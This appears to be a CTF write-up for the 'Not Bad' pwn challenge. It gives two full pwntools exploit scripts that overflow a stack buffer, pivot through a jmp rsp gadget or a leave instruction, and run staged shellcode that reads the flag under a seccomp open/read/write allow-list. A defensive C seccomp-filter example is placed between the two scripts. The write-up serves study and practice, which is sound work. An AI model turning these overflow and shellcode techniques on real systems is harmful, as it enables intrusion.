BUU - [极客大挑战 2019] Not Bad - Writeup

Posted on Jan 24, 2021

This challenge is actually pretty simple, but I still didn't manage to solve it :(

New takeaway

It turns out that on challenges with NX disabled you can use a jmp rsp gadget! Learned something. The binary contains this gadget, so we can run our shellcode directly without leaking a stack address. Of course, only 0x28 bytes of shellcode fit here, and seccomp disables every syscall except read, write, open and exit, so that length isn't enough; the idea is therefore to write the real shellcode into the mmap'd region and execute it there.

#!/usr/bin/env python
# coding=utf-8
from pwn import *
context(log_level = 'debug',os = 'linux',arch = 'amd64')

#sh = process("./bad")
sh = remote("node3.buuoj.cn",25651)

mapped_addr = 0x123000   # fixed mmap'd region the binary sets up
jmp_rax = 0x400865       # unused in this version
jmp_rsp = 0x400a01

# Stage 1 (0x28 bytes): read a larger stage 2 into the mmap'd region and call it.
payload = (asm(shellcraft.read(0,mapped_addr,0x100)) + asm("mov rax,0x123000;call rax")).ljust(0x28,b'\x00')
# Return into jmp rsp; rsp then points at "sub rsp,0x30; jmp rsp", which jumps back to the buffer start.
payload += p64(jmp_rsp) + asm("sub rsp,0x30;jmp rsp")
sh.sendafter(b"fun!\n",payload)

# Stage 2: only open/read/write are allowed by seccomp, so dump the flag file directly.
payload = shellcraft.open("./flag")
payload += shellcraft.read(3,mapped_addr + 0x200,0x40)
payload += shellcraft.write(1,mapped_addr + 0x200,0x40)

sh.sendline(asm(payload))

sh.interactive()

As for the seccomp family of functions, they serve to disable specific syscalls. Oddly, _seccomp_init seems unable to be called more than once; I had planned to get a shell by calling it a second time with every syscall allowed, but that went nowhere.
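The allow-list described above, rebuilt as a seccomp-bpf filter. This is an added defender-side example in C, not code from the writeup or the challenge binary: it gates on the x86-64 ABI, permits only read, write, open and exit (plus exit_group, an assumption so a normal C runtime can shut down), and carries a tiny interpreter so the filter's decisions can be checked without installing it. Seccomp filters are cumulative, so a filter installed later can only tighten an earlier one; that is why installing a permissive filter after the challenge's own cannot reopen syscalls.

```c
#include <stddef.h>
#include <sys/prctl.h>
#include <linux/filter.h>
#include <linux/seccomp.h>
#include <linux/audit.h>

/* x86-64 syscall numbers left reachable by the challenge: read, write, open, exit.
   exit_group (231) is added here as an assumption so a normal C runtime can exit. */
static const unsigned allowed_nr[] = { 0, 1, 2, 60, 231 };
#define N_ALLOWED (sizeof(allowed_nr) / sizeof(allowed_nr[0]))
#define FILTER_LEN (5 + 2 * N_ALLOWED)

/* Fill buf (FILTER_LEN entries) with the allow-list; returns the instruction count. */
size_t build_allowlist(struct sock_filter *buf)
{
    size_t n = 0;
    /* Kill callers using another ABI (e.g. the 32-bit one, whose numbers differ). */
    buf[n++] = (struct sock_filter)BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, arch));
    buf[n++] = (struct sock_filter)BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, AUDIT_ARCH_X86_64, 1, 0);
    buf[n++] = (struct sock_filter)BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL);
    buf[n++] = (struct sock_filter)BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, nr));
    for (size_t i = 0; i < N_ALLOWED; i++) {
        buf[n++] = (struct sock_filter)BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, allowed_nr[i], 0, 1);
        buf[n++] = (struct sock_filter)BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW);
    }
    buf[n++] = (struct sock_filter)BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL); /* default: deny */
    return n;
}

/* Interpreter for the three opcodes used above, so the filter can be checked without installing it. */
unsigned evaluate(const struct sock_filter *f, size_t n, unsigned arch, unsigned nr)
{
    unsigned acc = 0;
    for (size_t pc = 0; pc < n; pc++) {
        const struct sock_filter *ins = &f[pc];
        if (ins->code == (BPF_LD | BPF_W | BPF_ABS))
            acc = ins->k == offsetof(struct seccomp_data, arch) ? arch : nr;
        else if (ins->code == (BPF_JMP | BPF_JEQ | BPF_K))
            pc += acc == ins->k ? ins->jt : ins->jf;   /* jumps are relative to the next insn */
        else if (ins->code == (BPF_RET | BPF_K))
            return ins->k;
    }
    return SECCOMP_RET_KILL;
}

/* Install the filter; any filter added afterwards can only restrict further, never relax. */
int install_allowlist(void)
{
    struct sock_filter prog[FILTER_LEN];
    struct sock_fprog fprog = { .len = (unsigned short)build_allowlist(prog), .filter = prog };
    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) != 0) return -1;
    return prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &fprog);
}
```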

Initial approach

It had probably been a while since I last did any challenges and my head was a bit foggy; I thought of using leave to pivot the stack and run the shellcode, but got stuck for a long time before working out how. It's actually easy: for the pivot, leave rsp alone at first and only modify rbp, write the shellcode at 0x123000, then let the second leave change rsp so that the shellcode gets executed.

#!/usr/bin/env python
# coding=utf-8
from pwn import *
context(log_level = 'debug',os = 'linux',arch = 'amd64')

#sh = process("./bad")
sh = remote("node3.buuoj.cn",25651)

mapped_addr = 0x123000   # fixed mmap'd region the binary sets up
restart_addr = 0x400A1A  # re-enters the read so the buffer is filled a second time
leave_addr = 0x400A49    # unused in this version
pop_rdi_ret = 0x400b13   # unused in this version
jmp_rax = 0x400865       # unused in this version
jmp_rsp = 0x400a01       # unused in this version

# First pass: only overwrite saved rbp (pointing into the mmap'd region) and return to the read.
payload = b'a' * 0x20 + p64(mapped_addr + 0x20) + p64(restart_addr)
sh.sendlineafter(b"fun!\n",payload)

# Second pass: with rbp moved, the buffer now lives at 0x123000; 0x28 bytes of stage 1 go there,
# and the second leave pivots rsp so execution lands on it.
payload = asm(shellcraft.read(0,mapped_addr + 0x500,0x500)) + asm("mov rax,0x123500;call rax")
payload = payload.ljust(0x28,b'\x00')
payload += p64(0x123000)
sh.sendafter(b"fun!\n",payload)

# Stage 2: open/read/write are the only syscalls seccomp leaves, so dump the flag file.
payload = shellcraft.open("./flag")
payload += shellcraft.read(3,mapped_addr + 0x200,0x40)
payload += shellcraft.write(1,mapped_addr + 0x200,0x40)
sh.send(asm(payload))

sh.interactive()

It really is simple; why did it take me so much time? Tomorrow's advanced algebra exam is probably hopeless.